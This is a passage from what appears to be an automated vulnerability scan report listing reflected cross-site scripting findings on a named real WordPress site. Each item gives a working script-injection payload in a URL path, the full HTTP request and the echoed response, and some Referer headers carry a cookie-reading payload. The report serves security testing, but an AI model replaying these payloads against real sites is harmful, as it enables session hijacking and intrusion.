Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:56:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:56:23 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow90633\"><script>alert(1)</script>411b24f9cf/iepngfix.htc'; }); return true;" >
...[SNIP]...

4.339. http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/iepngfix.htc

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e177e"><script>alert(1)</script>9096259822e was submitted in the REST URL parameter 4. This input was echoed as e177e\"><script>alert(1)</script>9096259822e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/iepngfix.htce177e"><script>alert(1)</script>9096259822e HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:57:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:57:59 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:57:59 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/iepngfix.htce177e\"><script>alert(1)</script>9096259822e'; }); return true;" >
...[SNIP]...

4.340. http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41302"><script>alert(1)</script>e87a12b68da was submitted in the REST URL parameter 1. This input was echoed as 41302\"><script>alert(1)</script>e87a12b68da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content41302"><script>alert(1)</script>e87a12b68da/themes/shadow/style.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:06:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:06:52 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:06:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 50999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content41302\"><script>alert(1)</script>e87a12b68da/themes/shadow/style.css'; }); return true;" >
...[SNIP]...

4.341. http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed22"><script>alert(1)</script>5a2e316bbc0 was submitted in the REST URL parameter 2. This input was echoed as 9ed22\"><script>alert(1)</script>5a2e316bbc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes9ed22"><script>alert(1)</script>5a2e316bbc0/shadow/style.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 50999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes9ed22\"><script>alert(1)</script>5a2e316bbc0/shadow/style.css'; }); return true;" >
...[SNIP]...

4.342. http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97ab4"><script>alert(1)</script>3c035f3b0b7 was submitted in the REST URL parameter 3. This input was echoed as 97ab4\"><script>alert(1)</script>3c035f3b0b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow97ab4"><script>alert(1)</script>3c035f3b0b7/style.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:06 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 50999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow97ab4\"><script>alert(1)</script>3c035f3b0b7/style.css'; }); return true;" >
...[SNIP]...

4.343. http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/themes/shadow/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5175e"><script>alert(1)</script>c88bcf20bbe was submitted in the REST URL parameter 4. This input was echoed as 5175e\"><script>alert(1)</script>c88bcf20bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/style.css5175e"><script>alert(1)</script>c88bcf20bbe HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 50999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/style.css5175e\"><script>alert(1)</script>c88bcf20bbe'; }); return true;" >
...[SNIP]...

4.344. http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5c7a"><script>alert(1)</script>287ad5da87 was submitted in the REST URL parameter 1. This input was echoed as b5c7a\"><script>alert(1)</script>287ad5da87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesb5c7a"><script>alert(1)</script>287ad5da87/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0780e8d631c08885b1144b4b3d40c5f5
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:05 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includesb5c7a\"><script>alert(1)</script>287ad5da87/js/jquery/jquery.js?ver=1.3.2'; }); return true;" >
...[SNIP]...

4.345. http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d169"><script>alert(1)</script>c3aaf9c5f26 was submitted in the REST URL parameter 2. This input was echoed as 6d169\"><script>alert(1)</script>c3aaf9c5f26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js6d169"><script>alert(1)</script>c3aaf9c5f26/jquery/jquery.js?ver=1.3.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0780e8d631c08885b1144b4b3d40c5f5
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:57 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js6d169\"><script>alert(1)</script>c3aaf9c5f26/jquery/jquery.js?ver=1.3.2'; }); return true;" >
...[SNIP]...

4.346. http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 945b8"><script>alert(1)</script>61e796b665 was submitted in the REST URL parameter 3. This input was echoed as 945b8\"><script>alert(1)</script>61e796b665 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery945b8"><script>alert(1)</script>61e796b665/jquery.js?ver=1.3.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0780e8d631c08885b1144b4b3d40c5f5
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:50 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery945b8\"><script>alert(1)</script>61e796b665/jquery.js?ver=1.3.2'; }); return true;" >
...[SNIP]...

4.347. http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4f40"><script>alert(1)</script>f83f8fcb684 was submitted in the REST URL parameter 4. This input was echoed as f4f40\"><script>alert(1)</script>f83f8fcb684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.jsf4f40"><script>alert(1)</script>f83f8fcb684?ver=1.3.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0780e8d631c08885b1144b4b3d40c5f5
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:58 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/jquery.jsf4f40\"><script>alert(1)</script>f83f8fcb684?ver=1.3.2'; }); return true;" >
...[SNIP]...

4.348. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ae6"><script>alert(1)</script>6cd9f7aaf41 was submitted in the REST URL parameter 1. This input was echoed as 26ae6\"><script>alert(1)</script>6cd9f7aaf41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes26ae6"><script>alert(1)</script>6cd9f7aaf41/js/jquery/ui.core.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:37 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes26ae6\"><script>alert(1)</script>6cd9f7aaf41/js/jquery/ui.core.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.349. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72448"><script>alert(1)</script>0f970ac7d28 was submitted in the REST URL parameter 2. This input was echoed as 72448\"><script>alert(1)</script>0f970ac7d28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js72448"><script>alert(1)</script>0f970ac7d28/jquery/ui.core.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:34 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js72448\"><script>alert(1)</script>0f970ac7d28/jquery/ui.core.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.350. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75573"><script>alert(1)</script>aba3e01e65 was submitted in the REST URL parameter 3. This input was echoed as 75573\"><script>alert(1)</script>aba3e01e65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery75573"><script>alert(1)</script>aba3e01e65/ui.core.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
